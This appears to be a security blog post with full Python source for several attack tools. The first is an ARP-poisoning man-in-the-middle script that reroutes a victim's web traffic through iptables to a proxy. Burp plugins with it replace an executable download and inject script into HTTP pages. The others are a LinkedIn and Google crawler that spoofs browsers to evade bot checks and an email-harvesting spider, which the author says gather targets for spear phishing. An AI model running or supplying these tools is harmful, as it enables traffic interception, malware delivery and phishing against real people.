The code is hopefully straightforward. Usage might be python mitm.py –victim=192.168.1.14

from scapy.all import *
import time
import argparse
import os
import sys


def arpPoison(args):
  conf.iface= args.iface
  pkt = ARP()
  pkt.psrc = args.router
  pkt.pdst = args.victim
  try:
    while 1:
      send(pkt, verbose=args.verbose)
      time.sleep(args.freq)
  except KeyboardInterrupt:
    pass  

#default just grabs the default route, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefRoute(args):
  data = os.popen("/sbin/route -n ").readlines()
  for line in data:
    if line.startswith("0.0.0.0") and (args.iface in line):
      print "Setting route to the default: " + line.split()[1]
      args.router = line.split()[1]
      return
  print "Error: unable to find default route" 
  sys.exit(0)

#default just grabs the default IP, http://pypi.python.org/pypi/pynetinfo/0.1.9 would be better
#but this just works and people don't have to install external libs
def getDefIP(args):
  data = os.popen("/sbin/ifconfig " + args.iface).readlines()
  for line in data:
    if line.strip().startswith("inet addr"):
      args.proxy = line.split(":")[1].split()[0]
      print "setting proxy to: " + args.proxy
      return
  print "Error: unable to find default IP" 
  sys.exit(0)

def fwconf(args):
  #write appropriate kernel config settings
  f = open("/proc/sys/net/ipv4/ip_forward", "w")
  f.write('1')
  f.close()
  f = open("/proc/sys/net/ipv4/conf/" + args.iface + "/send_redirects", "w")
  f.write('0')
  f.close()

  #iptables stuff
  os.system("/sbin/iptables --flush")
  os.system("/sbin/iptables -t nat --flush")
  os.system("/sbin/iptables --zero")
  os.system("/sbin/iptables -A FORWARD --in-interface " +  args.iface + " -j ACCEPT")
  os.system("/sbin/iptables -t nat --append POSTROUTING --out-interface " + args.iface + " -j MASQUERADE")
  #forward 80,443 to our proxy
  for port in args.ports.split(","):
    os.system("/sbin/iptables -t nat -A PREROUTING -p tcp --dport " + port + " --jump DNAT --to-destination " + args.proxy)

parser = argparse.ArgumentParser()
parser.add_argument('--victim', required=True, help="victim IP")
parser.add_argument('--router', default=None)
parser.add_argument('--iface', default='eth1')
parser.add_argument('--fwconf', type=bool, default=True, help="Try to auto configure firewall")
parser.add_argument('--freq', type=float, default=5.0, help="frequency to send packets, in seconds")
parser.add_argument('--ports', default="80,443", help="comma seperated list of ports to forward to proxy")
parser.add_argument('--proxy', default=None)
parser.add_argument('--verbose', type=bool, default=True)

args = parser.parse_args()

#set default args
if args.router == None:
  getDefRoute(args)
if args.proxy == None:
  getDefIP(args)

#do iptables rules
if args.fwconf:
  fwconf(args)

arpPoison(args)

You can see some of what’s happening by dumping the arp tables on the victim machine. In my case, 192.168.1.1 is the gateway I’m spoofing.

after the script is run against the victim, the arp tables are changed to the attacker controlled ‘proxy’ value (by default the attacker machine). In this example it’s easy to see the legitimate gateway at 00:25:9c:4d:b3:cc has been replaced with our attacker machine 00:0c:29:8c:c1:d8.

At this point all traffic routes through us, and our iptables is configured to send ports 80 and 443 to our ‘proxy’. Your proxy should be configured to listen on all interfaces and set to “invisible” mode.

You should be able to see HTTP and HTTPS traffic from the victim routing through Burp. All other traffic (e.g. DNS) should pass through unmodified. Obviously, the ports that are forwarded and whatnot can be pretty easily configured, but this post is focusing on web attacks.

The next few sections of this post are some attacks that can be useful.

Replacing an HTTP Download

It’s very common, even for some of the best security organizations in the world, to allow downloads over HTTP (even in the somewhat rare case that the rest of their site is over HTTPS). You don’t have to look very far to find applications that are able to be downloaded without encryption, and in fact Firefox was the first place I looked. Here’s a stupid example where I use a burp plugin to detect when a user tries to download firefox, and then I replace it with chrome’s setup. I’m not trying to point out any problems with Mozilla – 99% of the internet’s executables seem to be downloaded over HTTP.

The Burp plugin uses this https://github.com/mwielgoszewski/jython-burp-api, which seems pretty cool. This was my first chance using it.

from gds.burp.api import IProxyRequestHandler
from gds.burp.core import Component, implements

class ExamplePlugin(Component):

    implements(IProxyRequestHandler)

    def processRequest(self, request):
        if "Firefox%20Setup%20" in request.url.geturl() and ".exe" in request.url.geturl():
            print "Firefox download detected, redirecting"
            request.host = "131.107.39.100"
            request.raw = ("GET /downloads/Firefox%20Setup%2013.0.1.exe HTTP/1.1\r\n" +
                "HOST: 131.107.39.100\r\n\r\n")


Clientside Attacks

Clientside attacks in the middle can be super interesting, and they include a lot of scenarios that aren’t always possible otherwise. Here’s a non-comprehensive list that comes to mind:

  • XSS in any HTTP site, and sometimes interaction with HTTPS sites if cookies aren’t secure
  • Cookie forcing is possible. E.g. if a CSRF protection compares a post parameter to a cookie then you can set the cookie and perform the CSRF, even if the site is HTTPS only. We talk about this in our CCC talk.
  • Forced NTLM relaying with most domain networks.
  • If XSS is already possible, you can force a victim to make these requests without convincing them to click on a link. This could be useful in targeted internal attacks, like these, that could get shells

Using the same techniques as above, we can write dirty burp plugins that insert Javascript into HTTP responses.

    def processResponse(self, request):
        #very sloppy way to call only once, forcing exception on the first call
        try:
            self.attack += 1
        except:
            script = "<script>alert(document.domain)</script>"
            #simply inject into the first </head> we see
            if "</head>" in request.response.raw:
                print "Beginning Injection..."
                print type(request.response.raw)
                request.response.raw = request.response.raw.replace("</head>", script + "</head>", 1)
                #self.attack = 1


Conclusions

Blah. Blah. Use HTTPS and expensive switches or static ports. Blah. Does this solve the problem, really? Blah. Blah.

I do have a reason for working on this. Can you pwn the corporate network just using ARP poisoning? NTLM relay attacks are freaking deadly, and I’ll be talking about them over the next few weeks, once at work and then at Blackhat as a tool arsenal demo. Man in the middle attacks like these offer a great/nasty way to target that operations guy and get code execution. More on this later.

Linkedin Crawler

The following is also source used in the grad project. I’ll post the actual paper at some point. But here is the linkedin crawler portion with the applicable source. By it’s nature, this code is breakable, and may not work even at the time of posting. But it did work long enough for me to gather addresses, which was the point.

Usage is/was

LinkedinPageGatherer.py Linkedinusername Linkedinpassword

Following is an excerpt from the ‘paper’.

the HTMLParser libraries are more resilient to changes in source. Both HTMLParser and lxml libraries have different code available to process broken HTML. The HTMLParser libraries were chosen as more appropriate for these problems [lxml][htmlparsing].

There has been an effort to put all HTML specific logic in debuggable places so if the HTML generated changes then it is easy to modify the code parsing to reflect those changes (assuming equivalent information is available). However, changes in source are frequent, and the source code has had to be modified roughly every 3 months to reflect changes in HTML layout.

Unfortunately, although the functionality is simple, this program has grown to be much more complex due to roadblocks put in place by both LinkedIn Google.

To search LinkedIn from itself, it is necessary to have a LinkedIn account. With an account, it is possible to search with or without connections, although the searching criteria differ depending on the type of account you have. Because of this, one of the criteria for searching LinkedIn is cookie management, which has to be written to keep track of the HTTP session. In addition, LinkedIn uses a POST parameter nonce at each page that must be retrieved and POSTed for every page submission. Because of the nonce, it is also necessary to login at the login page, save the nonce and the cookie, and proceed to search through the same path an actual user would.

Once the tool is able to search for companies, there is an additional limitation. With the free account, the search is limited to displaying only 100 connections. This is inconvenient as the desired number of actual connections is often much larger. The tool I’ve written takes various criteria (such as location, title, etc) to perform multiple more specific searches of 100 results each. The extra information is harvested at each search to use for later searches. With more specific searches, the tool inserts unique items into a list of users. When the initial search initiates, LinkedIn reports the total number of results (although it only lets the account view 100 at a time) so the tool uses this total number as one possible stopping condition – when a percentage of that number has been reached or a certain number of failed searches have been tried.

This is easier to illustrate with an example. In the case of FPL, there are over 2000 results. However, it can be asserted that at least one of the results is from a certain Miami address. Using this as a search restriction the total results may be reduced to 500, the first 100 of which can be inserted. It can also be asserted that there is at least one result from the Miami address who is a project manager. Using this restriction, there are only 5 results, which have different criteria to do advanced searches on. Using this iterative approach, it is possible to gather most of the 2000. In the program I have written, this functionality is still experimental and the parameters must be adjusted.

One additional difficulty with LinkedIn is that with these results it does not display a name, only a job title associated with the company. Obviously, this is not ideal. A name is necessary for even the most basic spear phishing attacks. An email may sound slightly awkward if addressed as “Dear Project Manager in the Cyber Security Group”. The solution I found to retrieve employee names is to use Google. Using specific Google queries based on the LinkedIn names, it is possible to retrieve the names associated with a job, company, and job title.

Google has a use policy prohibiting automated crawlers. Because of this policy, it does various checks on the queries to verify that the browser is a known real browser. If it is not, Google returns a 403 status stating that the browser is not known. To circumvent this, a packet dump was performed on a valid browser. The code now has a snippet to send information exactly like an actual browser would along with randomized time delays to mimic a person. It should be impossible for Google to tell the difference over the long run – whatever checks they do can be mimicked. The code includes several configurable browsers to masquerade as. Below is the code snippet including the default spoofed browser which is Firefox running on Linux.

def getHeaders(self, browser="ubuntuFF"):
  #ubuntu firefox spoof
  if browser == "ubuntuFF":
    headers = {
      "Host": "www.google.com",
      "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
      "Accept" : "text/html,application/xhtml+xml,application xml;q=0.9,*/*;q=0.8",
      "Accept-Language" : "en-us,en;q=0.5",
      "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
      "Keep-Alive" : "300",
      "Proxy-Connection" : "keep-alive"
    }
...

Although both Google and LinkedIn make it difficult to automate information mining, their approach will fundamentally fail a motivated adversary. Because these companies want to make information available to users, this information can also be retrieved automatically. Captcha technology has been one traditional solution, though by its nature it suffers from similar flaws in design.

The LinkedIn crawler program demonstrates the possibility of an attacker targeting a company to harvest people’s names, which many times can be mapped to email addresses as demonstrated in previous sections.

GoogleQueery.py

#! /usr/bin/python

#class to make google queries
#must masquerade as a legitimate browser
#Using this violates Google ToS

import httplib
import urllib
import sys
import HTMLParser
import re

#class is basically fed a google url for linkedin for the
#sole purpose of getting a linkedin link
class GoogleQueery(HTMLParser.HTMLParser):
  def __init__(self, goog_url):
    HTMLParser.HTMLParser.__init__(self)
    self.linkedinurl = []
    query = urllib.urlencode({"q": goog_url})
    conn = httplib.HTTPConnection("www.google.com")
    headers = self.getHeaders()
    conn.request("GET", "/search?hl=en&"+query, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    self.feed(data)
    self.get_num_results(data)
    conn.close()

  #this is necessary because google wants to be mean and 403 based on... not sure
  #but it seems  I must look like a real browser to get a 200
  def getHeaders(self, browser="chromium"):
    #if browser == "random":
      #TODO randomize choice
    #ubuntu firefox spoof
    if browser == "ubuntuFF":
      headers = {
        "Host": "www.google.com",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "en-us,en;q=0.5",
        "Accept-Charset" : "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
        "Keep-Alive" : "300",
        "Proxy-Connection" : "keep-alive"
        }
    elif browser == "chromium":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Avail-Dictionary": "FcpNLYBN",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    elif browser == "ie":
      headers = {
        "Host": "www.google.com",
        "Proxy-Connection": "keep-alive",
        "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
        "Referer": "http://www.google.com/",
        "Accept": "application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
        "Accept-Language": "en-US,en;q=0.8",
        "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
      }
    return headers

  def get_num_results(self, data):
    index = re.search("<b>1</b> - <b>[d]+</b> of [w]*[ ]?<b>([d,]+)", data)
    try:
      self.numResults = int(index.group(1).replace(",", ""))
    except:
      self.numResults = 0
      if not "- did not match any documents. " in data:
        print "Warning: numresults parsing problem"
        print "setting number of results to 0"

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "a" and ((("linkedin.com/pub/" in attrs[0][1])
                    or  ("linkedin.com/in" in attrs[0][1]))
                    and ("http://" in attrs[0][1])
                    and ("search?q=cache" not in attrs[0][1])
                    and ("/dir/" not in attrs[0][1])):
        self.linkedinurl.append(attrs[0][1])
        #print self.linkedinurl
      #perhaps add a google cache option here in the future
    except IndexError:
      pass

#for testing
if __name__ == "__main__":
  #url = "site:linkedin.com "PROJECT ADMINISTRATOR at CAT INL QATAR W.L.L." "Qatar""
  m = GoogleQueery(url)

LinkedinHTMLParser.py

#! /usr/bin/python

#this should probably be put in LinkedinPageGatherer.py

import HTMLParser

from person_searchobj import person_searchobj

class LinkedinHTMLParser(HTMLParser.HTMLParser):
  """
  subclass of HTMLParser specifically for parsing Linkedin names to person_searchobjs
  requires a call to .feed(data), stored data in the personArray
  """
  def __init__(self):
    HTMLParser.HTMLParser.__init__(self)
    self.personArray = []
    self.personIndex = -1
    self.inGivenName = False
    self.inFamilyName = False
    self.inTitle = False
    self.inLocation = False

  def handle_starttag(self, tag, attrs):
    try:
      if tag == "li" and attrs[0][0] == "class" and ("vcard" in attrs[0][1]):
        self.personIndex += 1
        self.personArray.append(person_searchobj())
      if attrs[0][1] == "given-name" and self.personIndex >=0:
        self.inGivenName = True
      elif attrs[0][1] == "family-name" and self.personIndex >= 0:
        self.inFamilyName = True
      elif tag == "dd" and attrs[0][1] == "title" and self.personIndex >= 0:
        self.inTitle = True
      elif tag == "span" and attrs[0][1] == "location" and self.personIndex >= 0:
        self.inLocation = True
    except IndexError:
      pass

  def handle_endtag(self, tag):
    if tag == "span":
      self.inGivenName = False
      self.inFamilyName = False
      self.inLocation = False
    elif tag == "dd":
      self.inTitle = False

  def handle_data(self, data):
    if self.inGivenName:
      self.personArray[self.personIndex].givenName = data.strip()
    elif self.inFamilyName:
      self.personArray[self.personIndex].familyName = data.strip()
    elif self.inTitle:
      self.personArray[self.personIndex].title = data.strip()
    elif self.inLocation:
      self.personArray[self.personIndex].location = data.strip()

#for testing - use a file since this is just a parser
if __name__ == "__main__":
  import sys
  file = open ("test.htm")
  df = file.read()
  parser = LinkedinHTMLParser()
  parser.feed(df)
  print "================"
  for person in parser.personArray:
    print person.goog_printstring()
  file.close()

LinkedinPageGatherer.py – this is what should be called directly.

#!/usr/bin/python

import urllib
import urllib2
import sys
import time
import copy
import pickle
import math

from person_searchobj import person_searchobj
from LinkedinHTMLParser import LinkedinHTMLParser
from GoogleQueery import GoogleQueery

#TODO add a test function that tests the website format for easy diagnostics when HTML changes
#TODO use HTMLParser like a sane person
class LinkedinPageGatherer:
  """
  class that generates the initial linkeding queeries using the company name
  as a search parameter. These search strings will be searched using google
  to obtain additional information (these limited initial search strings usually lack
  vital info like names)
  """
  def __init__(self, companyName, login, password, maxsearch=100,
               totalresultpercent=.7, maxskunk=100):
    """
    login and password are params for a valid linkedin account
    maxsearch is the number of results - linkedin limit unpaid accounts to 100
    totalresultpercent is the number of results this script will try to find
    maxskunk is the number of searches this class will attempt before giving up
    """
    #list of person_searchobj
    self.people_searchobj = []
    self.companyName = companyName
    self.login = login
    self.password = password
    self.fullurl = ("http://www.linkedin.com/search?search=&company="+companyName+
                    "&currentCompany=currentCompany", "&page_num=", "0")
    self.opener = self.linkedin_login()
    #for the smart_people_adder
    self.searchSpecific = []
    #can only look at 100 people at a time. Parameters used to narrow down queries
    self.total_results = self.get_num_results()
    self.maxsearch = maxsearch
    self.totalresultpercent = totalresultpercent
    #self.extraparameters = {"locationinfo" : [], "titleinfo" : [], "locationtitle" : [] }
    #extraparameters is a simple stack that adds keywords to restrict the search
    self.extraparameters = []
    #TODO can only look at 100 people at a time - like to narrow down queries
    #and auto grab more
    currrespercent = 0.0
    skunked = 0
    currurl = self.fullurl[0] + self.fullurl[1]
    extraparamindex = 0

    while currrespercent < self.totalresultpercent and skunked <= maxskunk:
      numresults = self.get_num_results(currurl)
      save_num = len(self.people_searchobj)

      print "-------"
      print "currurl", currurl
      print "percentage", currrespercent
      print "skunked", skunked
      print "numresults", numresults
      print "save_num", save_num

      for i in range (0, int(min(math.ceil(self.maxsearch/10), math.ceil(numresults/10)))):
        #function adds to self.people_searchobj
        print "currurl" + currurl + str(i)
        self.return_people_links(currurl + str(i))
      currrespercent = float(len(self.people_searchobj))/self.total_results
      if save_num == len(self.people_searchobj):
        skunked += 1
      for i in self.people_searchobj:
        pushTitles = [("title", gName) for gName in i.givenName.split()]
        #TODO this could be inproved for more detailed results, etc, but keeping it simple for now
        pushKeywords = [("keywords", gName) for gName in i.givenName.split()]
        pushTotal = pushTitles[:] + pushKeywords[:]
        #append to extraparameters if unique
        self.push_search_parameters(pushTotal)
      print "parameters", self.extraparameters
      #get a new url to search for, if necessary
      #use the extra params in title, "keywords" parameters
      try:
        refineel = self.extraparameters[extraparamindex]
        extraparamindex += 1
        currurl = self.fullurl[0] + "&" + refineel[0] + "=" + refineel[1] + self.fullurl[1]
      except IndexError:
        break

  """
  #TODO: This idea is fine, but we should get names first to better distinguish people
  #also maybe should be moved
  def smart_people_adder(self):
    #we've already done a basic search, must do more
    if "basic" in self.searchSpecific:
  """
  def return_people_links(self, linkedinurl):
    req = urllib2.Request(linkedinurl)
    fd = self.opener.open(req)
    pagedata = ""
    while 1:
      data = fd.read(2056)
      pagedata = pagedata + data
      if not len(data):
        break
    #print pagedata
    self.parse_page(pagedata)

  def parse_page(self, page):
    thesePeople = LinkedinHTMLParser()
    thesePeople.feed(page)
    for newperson in thesePeople.personArray:
      unique = True
      for oldperson in self.people_searchobj:
        #if all these things match but they really are different people, they
        #will likely still be found as unique google results
        if (oldperson.givenName == newperson.givenName and
            oldperson.familyName == newperson.familyName and
            oldperson.title == newperson.title and
            oldperson.location == oldperson.location):
              unique = False
              break
      if unique:
        self.people_searchobj.append(newperson)
  """
    print "======================="
    for person in self.people_searchobj:
      print person.goog_printstring()
  """

  #return the number of results, very breakable
  def get_num_results(self, url=None):
    #by default return total in company
    if url == None:
      fd = self.opener.open(self.fullurl[0] + "1")
    else:
      fd = self.opener.open(url)
    data = fd.read()
    fd.close()
    searchstr = "<p class="summary">"
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find("</strong>", sindex)
    return(int(data[sindex:eindex].strip().strip("<strong>").replace(",", "").strip()))

  #returns an opener object that contains valid cookies
  def linkedin_login(self):
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
    urllib2.install_opener(opener)
    #login page
    fd = opener.open("https://www.linkedin.com/secure/login?trk=hb_signin")
    data = fd.read()
    fd.close()
    #csrf 'prevention' login value
    searchstr = """<input type="hidden" name="csrfToken" value="ajax:"""
    sindex = data.find(searchstr) + len(searchstr)
    eindex = data.find('"', sindex)
    params = urllib.urlencode(dict(csrfToken="ajax:-"+data[sindex:eindex],
                              session_key=self.login,
                              session_password=self.password,
                              session_login="Sign+In",
                              session_rikey=""))
    #need the second request to get the csrf stuff, initial cookies
    request = urllib2.Request("https://www.linkedin.com/secure/login")
    request.add_header("Host", "www.linkedin.com")
    request.add_header("Referer", "https://www.linkedin.com/secure/login?trk=hb_signin")
    time.sleep(1.5)
    fd = opener.open(request, params)
    data = fd.read()
    if "<div id="header" class="guest">" in data:
      print "Linkedin authentication faild. Please supply a valid linkedin account"
      sys.exit(1)
    else:
      print "Linkedin authentication Successful"
    fd.close()
    return opener

  def push_search_parameters(self, extraparam):
    uselesswords = [ "for", "the", "and", "at", "in"]
    for pm in extraparam:
      pm = (pm[0], pm[1].strip().lower())
      if (pm not in self.extraparameters) and (pm[1] not in uselesswords) and pm != None:
        self.extraparameters.append(pm)

class LinkedinTotalPageGather(LinkedinPageGatherer):
  """
  Overhead class that generates the person_searchobjs, using GoogleQueery
  """
  def __init__(self, companyName, login, password):
    LinkedinPageGatherer.__init__(self, companyName, login, password)
    extraPeople = []
    for person in self.people_searchobj:
      mgoogqueery = GoogleQueery(person.goog_printstring())
      #making the assumption that each pub url is a unique person
      count = 0
      for url in mgoogqueery.linkedinurl:
        #grab the real name from the url
        begindex = url.find("/pub/") + 5
        endindex = url.find("/", begindex)
        if count == 0:
          person.url = url
          person.name = url[begindex:endindex]
        else:
          extraObj = copy.deepcopy(person)
          extraObj.url = url
          extraObj.name = url[begindex:endindex]
          extraPeople.append(extraObj)
        count += 1
      print person
    print "Extra People"
    for person in extraPeople:
      print person
      self.people_searchobj.append(person)

if __name__ == "__main__":
  #args are email and password for linkedin
  my = LinkedinTotalPageGather(company, sys.argv[1], sys.argv[2])

person_searchobj.py

#! /usr/bin/python

class person_searchobj():
  """this object is used for the google search and the final person object"""

  def __init__ (self, givenname="", familyname="", title="", organization="", location=""):
    """
    given name could be a title in this case, does not matter in terms of google
    but then may have to change for the final person object
    """
    #"name" is their actual name, unlike givenName and family name which are linkedin names
    self.name = ""
    self.givenName = givenname
    self.familyName = familyname
    self.title = title
    self.organization = organization
    self.location = location

    #this is retrieved by GoogleQueery
    self.url = ""

  def goog_printstring(self):
    """return the google print string used for queries"""
    retrstr = "site:linkedin.com "
    for i in  [self.givenName, self.familyName, self.title, self.organization, self.location]:
      if i != "":
        retrstr += '"' + i +'" '
    return retrstr

  def __repr__(self):
    """Overload __repr__ for easy printing. Mostly for debugging"""
    return (self.name + "n" +
            "------n"
            "GivenName: " + self.givenName + "n" +
            "familyName:" + self.familyName + "n" +
            "Title:" + self.title + "n" +
            "Organization:" + self.organization + "n" +
            "Location" + self.location + "n" +
            "URL:" + self.url + "nn")

email_spider

This was a small part of a project that was itself about 1/3 of my graduate project. I used it to collect certain information. Here is the excerpt from the paper.

Website Email Spider Program

In order to automatically process publicly available email addresses, a simple tool was developed, with source code available in Appendix A. An automated tool is able to process web pages in a way that is less error prone than manual methods, and it also makes processing the sheer number of websites possible (or at least less tedious).
This tool begins at a few root pages, which can be comma delimited. From these, it searches for all unique links by keeping track of a queue so that pages are not usually revisited (although revisiting a page is still possible in case the server is case insensitive or equivalent pages are dynamically generated with unique URLs). In addition, the base class is passed a website scope so that pages outside of that scope are not spidered. By default, the scope is simply a regular expression including the top domain name of the organization.

Each page requested searches the contents for the following regular expression to identify common email formats:

[w_.-]{3,}@[w_.-]{6,}

The 3 and 6 repeaters were necessary because of false positives otherwise obtained due to various encodings. This regular expression will not obtain all email addresses. However, it will obtain the most common addresses with a minimum of false positives. In addition, the obtained email addresses are run against a blacklist of uninteresting generic form addresses (such as help@example.com, info@example.com, or sales@example.com).

These email addresses are saved in memory and reported when the program completes or is interrupted. Note because of the dynamic nature of some pages, these can potentially spider infinitely and must be interrupted (for example, a calendar application that uses links to go back in time indefinitely). Most emails seemed to be obtained in the first 1,000 pages crawled. A limit of 10,000 pages was chosen as a reasonable scope. Although this limit was reached several times, the spider program uses a breadth search method. It was observed that most unique addresses were obtained early in the spidering process, and extending the number of pages tended to have a diminishing return. Despite this, websites with more pages also tended to correlate with greater email addresses returned (see analysis section).

Much of the logic in the spidering tool is dedicated to correctly parsing html. By their nature, web pages vary widely with links, with many sites using a mix of directory traversal, absolute URLs, and partial URLs. It is no surprise there are so many security vulnerabilities related to browsers parsing this complex data.
There is also an effort made to make the software somewhat more efficient by ignoring superfluous links to objects such as documents, executables, etc. Although if such a file is encountered an exception will catch the processing error, these files consume resources.

Using this tool is straightforward, but a certain familiarity is expected – it was not developed for an end user but for this specific experiment. For example, a URL is best processed in the format http://example.com/ since in its current state it would use example.com to verify that spidered addresses are within a reasonable scope. It prints debugging messages constantly because every site seemed to have unique parsing quirks. Although other formats and usages may work, there was little effort to make this software easy to use.

Here is the source.
#!/usr/bin/python

import HTMLParser
import urllib2
import re
import sys
import signal
import socket

socket.setdefaulttimeout(20)

#spider is meant for a single url
#proto can be http, https, or any
class PageSpider(HTMLParser.HTMLParser):
  def __init__(self, url, scope, searchList=[], emailList=[], errorDict={}):
    HTMLParser.HTMLParser.__init__(self)
    self.url = url
    self.scope = scope
    self.searchList = searchList
    self.emailList = emailList
    try:
      urlre = re.search(r"(w+):[/]+([^/]+).*", self.url)
      self.baseurl = urlre.group(2)
      self.proto = urlre.group(1)
    except AttributeError:
      raise Exception("URLFormat", "URL passed is invalid")
    if self.scope == None:
      self.scope = self.baseurl
    try:
      req = urllib2.urlopen(self.url)
      htmlstuff = req.read()
    except KeyboardInterrupt:
      raise
    except urllib2.HTTPError:
      #not able to fetch a url eg 404
      errorDict["link"] += 1
      print "Warning: link error"
      return
    except urllib2.URLError:
      errorDict["link"] += 1
      print "Warning: URLError"
      return
    except ValueError:
      errorDict["link"] += 1
      print "Warning link error"
      return
    except:
      print "Unknown Error", self.url
      errorDict["link"] += 1
      return
    emailre = re.compile(r"[w_.-]{3,}@[w_.-]{2,}.[w_.-]{2,}")
    nemail = re.findall(emailre, htmlstuff)
    for i in nemail:
      if i not in self.emailList:
        self.emailList.append(i)
    try:
      self.feed(htmlstuff)
    except HTMLParser.HTMLParseError:
      errorDict["parse"] += 1
      print "Warning: HTML Parse Error"
      pass
    except UnicodeDecodeError:
      errorDict["decoding"] += 1
      print "Warning: Unicode Decode Error"
      pass
  def handle_starttag(self, tag, attrs):
    if (tag == "a" or tag =="link") and attrs:
      #process the url formats, make sure the base is in scope
      for k, v in attrs:
        #check it's an htref and that it's within scope
        if  (k == "href" and
            ((("http" in v) and (re.search(self.scope, v))) or
            ("http" not in v)) and
            (not (v.endswith(".pdf") or v.endswith(".exe") or
             v.endswith(".doc") or v.endswith(".docx") or
             v.endswith(".jpg") or v.endswith(".jpeg") or
             v.endswith(".png") or v.endswith(".css") or
             v.endswith(".gif") or v.endswith(".GIF") or
             v.endswith(".mp3") or v.endswith(".mp4") or
             v.endswith(".mov") or v.endswith(".MOV") or
             v.endswith(".avi") or v.endswith(".flv") or
             v.endswith(".wmv") or v.endswith(".wav") or
             v.endswith(".ogg") or v.endswith(".odt") or
             v.endswith(".zip") or v.endswith(".gz") or
             v.endswith(".bz") or v.endswith(".tar") or
             v.endswith(".xls") or v.endswith(".xlsx") or
             v.endswith(".qt") or v.endswith(".divx") or
             v.endswith(".JPG") or v.endswith(".JPEG")))):
          #Also todo - modify regex so that >= 3 chars in front >= 7 chars in back
          url = self.urlProcess(v)
          #TODO 10000 is completely arbitrary
          if (url not in self.searchList) and (url != None) and len(self.searchList) < 10000:
            self.searchList.append(url)
  #returns complete url in the form http://stuff/bleh
  #as input handles (./url, http://stuff/bleh/url, //stuff/bleh/url)
  def urlProcess(self, link):
    link = link.strip()
    if "http" in link:
      return (link)
    elif link.startswith("//"):
      return self.proto + "://" + link[2:]
    elif link.startswith("/"):
      return self.proto + "://" + self.baseurl + link
    elif link.startswith("#"):
      return None
    elif ":" not in link and " " not in link:
      while link.startswith("../"):
        link = link[3:]
        #TODO [8:-1] is just a heuristic, but too many misses shouldn't be bad... maybe?
        if self.url.endswith("/") and ("/" in self.url[8:-1]):
          self.url = self.url[:self.url.rfind("/", 0, -1)] + "/"
      dir = self.url[:self.url.rfind("/")] + "/"
      return dir + link
    return None

class SiteSpider:
  def __init__(self, searchList, scope=None, verbocity=True, maxDepth=4):
    #TODO maxDepth logic
    #necessary to add to this list to avoid infinite loops
    self.searchList = searchList
    self.emailList = []
    self.errors = {"decoding":0, "link":0, "parse":0, "connection":0, "unknown":0}
    if scope == None:
      try:
        urlre = re.search(r"(w+):[/]+([^/]+).*", self.searchList[0])
        self.scope = urlre.group(2)
      except AttributeError:
        raise Exception("URLFormat", "URL passed is invalid")
    else:
      self.scope = scope
    index = 0
    threshhold = 0
    while 1:
      try:
        PageSpider(self.searchList[index], self.scope, self.searchList, self.emailList, self.errors)
        if verbocity:
          print self.searchList[index]
          print " Total Emails:", len(self.emailList)
          print " Pages Processed:", index
          print " Pages Found:", len(self.searchList)
        index += 1
      except IndexError:
        break
      except KeyboardInterrupt:
        break
      except:
        threshhold += 1
        print "Warning: unknown error"
        self.errors["unknown"] += 1
        if threshhold >= 40:
          break
        pass
    garbageEmails =   [ "help",
                        "webmaster",
                        "contact",
                        "sales" ]
    print "REPORT"
    print "----------"
    for email in self.emailList:
      if email not in garbageEmails:
        print email
    print "nTotal Emails:", len(self.emailList)
    print "Pages Processed:", index
    print "Errors:", self.errors

if __name__ == "__main__":
  SiteSpider(sys.argv[1].split(","))